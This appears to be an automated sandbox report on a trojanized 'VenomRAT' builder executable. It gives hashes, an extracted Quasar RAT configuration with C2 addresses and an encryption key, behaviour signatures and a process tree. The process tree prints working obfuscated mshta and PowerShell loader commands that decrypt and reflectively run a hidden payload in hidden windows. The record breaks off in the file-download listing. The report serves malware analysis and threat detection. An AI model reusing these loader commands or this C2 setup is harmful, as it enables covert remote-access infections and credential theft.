Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
15-04-2024 16:24
General
-
Target
VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
-
Size
26.1MB
-
MD5
a8776c9984c7b6c4f18bf0505ca939b5
-
SHA1
e23a41b6f03f11d3b6a64d5645fa102f373bd292
-
SHA256
5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
-
SHA512
9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
-
SSDEEP
786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC
Score
10/10
Malware Config
Extracted
Family
quasar
Version
1.0.0.0
Botnet
v3.0.0 | Venom
C2
134.255.254.225:5050
buy-positioning.at.ply.gg:58563
buy-positioning.at.ply.gg:5050
Mutex
90bea261-2bc5-4336-a086-718cd0ea9335
Attributes
-
encryption_key
4A61C133F5AD65F90240BF44872C676E824A6CA7
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
1000
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Impair Defenses: Safe Mode Boot 1 TTPs 64 IoCs
-
Hide Artifacts: Hidden Window 1 TTPs 3 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
-
Drops file in System32 directory 14 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 55 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fcYQxVhvEiaGdINTAJQc4312:qVGNVAkw=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-fcYQxVhvEiaGdINTAJQc4312:qVGNVAkw=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function vpfKo($AXvKx){ $pmDaH=[System.Security.Cryptography.Aes]::Create(); $pmDaH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pmDaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pmDaH.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('S8I/JB6h63VJVyRwXhsR1fx8Qr4kYdDHFPabp7ShcDo='); $pmDaH.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('OOdQFhRQ/WyNc0rB6X6zGg=='); $OkfKG=$pmDaH.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $ICUsA=$OkfKG.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($AXvKx, 0, $AXvKx.Length); $OkfKG.Dispose(); $pmDaH.Dispose(); $ICUsA;}function yydTP($AXvKx){ $VEKtD=New-Object System.IO.MemoryStream(,$AXvKx); $cKVem=New-Object System.IO.MemoryStream; Invoke-Expression '$aCgbX @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$VEKtD,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $aCgbX.CopyTo($cKVem); $aCgbX.Dispose(); $VEKtD.Dispose(); $cKVem.Dispose(); $cKVem.ToArray();}function pVpLU($AXvKx){ $ICUsA = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AXvKx); $ICUsA = vpfKo($ICUsA); $ICUsA = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($ICUsA); return $ICUsA;}function execute_function($AXvKx,$PGeaa){ $XFfDg = @( '$MaCMO = [System.Reflection.Assembly]::Load([byte[]]$AXvKx);', '$GjGDk = $MaCMO.EntryPoint;', '$GjGDk.Invoke($null, $PGeaa);' ); foreach ($ZgArE in $XFfDg) { Invoke-Expression $ZgArE };}$mcsnP = pVpLU('D/6Rn1aVXydjdSdYEzCFyA==');$AcGBo = pVpLU('3qhmJxJVzY2OUhpPwB/Vd4jKHu6zDtZV/3PbP1XuxO0=');$IzvoI = pVpLU('9YPbC77NnIZPJat9F5fZHw==');$mmktH = pVpLU('+xwGf7hrpUT51MKMTRoa8Q==');if (@(get-process -ea silentlycontinue $mmktH).count -gt 1) {exit};$hsdip = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($mcsnP).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($AcGBo);$nHnyw=yydTP (vpfKo ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hsdip)));execute_function $nHnyw (,[string[]] ($IzvoI)); "4⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /C echo [System.Diagnostics.Process]::GetProcessById(2520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function vpfKo($AXvKx){ $pmDaH=[System.Security.Cryptography.Aes]::Create(); $pmDaH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pmDaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pmDaH.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('S8I/JB6h63VJVyRwXhsR1fx8Qr4kYdDHFPabp7ShcDo='); $pmDaH.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('OOdQFhRQ/WyNc0rB6X6zGg=='); $OkfKG=$pmDaH.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $ICUsA=$OkfKG.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($AXvKx, 0, $AXvKx.Length); $OkfKG.Dispose(); $pmDaH.Dispose(); $ICUsA;}function yydTP($AXvKx){ $VEKtD=New-Object System.IO.MemoryStream(,$AXvKx); $cKVem=New-Object System.IO.MemoryStream; Invoke-Expression '$aCgbX @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$VEKtD,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $aCgbX.CopyTo($cKVem); $aCgbX.Dispose(); $VEKtD.Dispose(); $cKVem.Dispose(); $cKVem.ToArray();}function pVpLU($AXvKx){ $ICUsA = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($AXvKx); $ICUsA = vpfKo($ICUsA); $ICUsA = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($ICUsA); return $ICUsA;}function execute_function($AXvKx,$PGeaa){ $XFfDg = @( '$MaCMO = [System.Reflection.Assembly]::Load([byte[]]$AXvKx);', '$GjGDk = $MaCMO.EntryPoint;', '$GjGDk.Invoke($null, $PGeaa);' ); foreach ($ZgArE in $XFfDg) { Invoke-Expression $ZgArE };}$mcsnP = pVpLU('D/6Rn1aVXydjdSdYEzCFyA==');$AcGBo = pVpLU('3qhmJxJVzY2OUhpPwB/Vd4jKHu6zDtZV/3PbP1XuxO0=');$IzvoI = pVpLU('9YPbC77NnIZPJat9F5fZHw==');$mmktH = pVpLU('+xwGf7hrpUT51MKMTRoa8Q==');if (@(get-process -ea silentlycontinue $mmktH).count -gt 1) {exit};$hsdip = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($mcsnP).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($AcGBo);$nHnyw=yydTP (vpfKo ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hsdip)));execute_function $nHnyw (,[string[]] ($IzvoI)); | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [System.Diagnostics.Process]::GetProcessById(2520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function vpfKo($AXvKx){ $pmDaH=[System.Security.Cryptography.Aes]::Create(); $pmDaH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pmDaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pmDaH.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('S8I/JB6h63VJVyRwXhsR1fx8Qr4kYdDHFPabp7ShcDo='); $pmDaH.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('OOdQFhRQ/WyNc0rB6X6zGg=='); $OkfKG=$pmDaH.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $ICUsA=$OkfKG.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($AXvKx, 0, $AXvKx.Length); $OkfKG.Dispose(); $pmDaH.Dispose(); $ICUsA;}function yydTP($AXvKx){ $VEKtD=New-Object System.IO.MemoryStream(,$AXvKx); $cKVem=New-Object System.IO.MemoryStream; Invoke-Expression '$aCgbX @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$VEKtD,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $aCgbX.CopyTo($cKVem); $aCgbX.Dispose(); $VEKtD.Dispose(); $cKVem.Dispose(); $cKVem.ToArray();}function pVpLU($AXvKx){ $ICUsA = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($AXvKx); $ICUsA = vpfKo($ICUsA); $ICUsA = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($ICUsA); return $ICUsA;}function execute_function($AXvKx,$PGeaa){ $XFfDg = @( '$MaCMO = [System.Reflection.Assembly]::Load([byte[]]$AXvKx);', '$GjGDk = $MaCMO.EntryPoint;', '$GjGDk.Invoke($null, $PGeaa);' ); foreach ($ZgArE in $XFfDg) { Invoke-Expression $ZgArE };}$mcsnP = pVpLU('D/6Rn1aVXydjdSdYEzCFyA==');$AcGBo = pVpLU('3qhmJxJVzY2OUhpPwB/Vd4jKHu6zDtZV/3PbP1XuxO0=');$IzvoI = pVpLU('9YPbC77NnIZPJat9F5fZHw==');$mmktH = pVpLU('+xwGf7hrpUT51MKMTRoa8Q==');if (@(get-process -ea silentlycontinue $mmktH).count -gt 1) {exit};$hsdip = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($mcsnP).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($AcGBo);$nHnyw=yydTP (vpfKo ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hsdip)));execute_function $nHnyw (,[string[]] ($IzvoI)); "6⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass6⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Impair Defenses: Safe Mode Boot
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Venom RAT + HVNC + Stealer + Grabber.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD560e639a3ad6b4a308304757af2abd837
SHA149fbd02334679a390517005efca6ca876d21fb3a
SHA256ab88e7cc97a1e873b1477836050c928e0f3594d2eb791f2c8ed7d80b77ec416b
SHA5129a67d1dde94db06949e16874d27af971d78c32c2f54fcf890be58a100649f3c387ae43be76f3228ff516ede1f9556b587e6bc8030183529a96702b41aa570df5
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
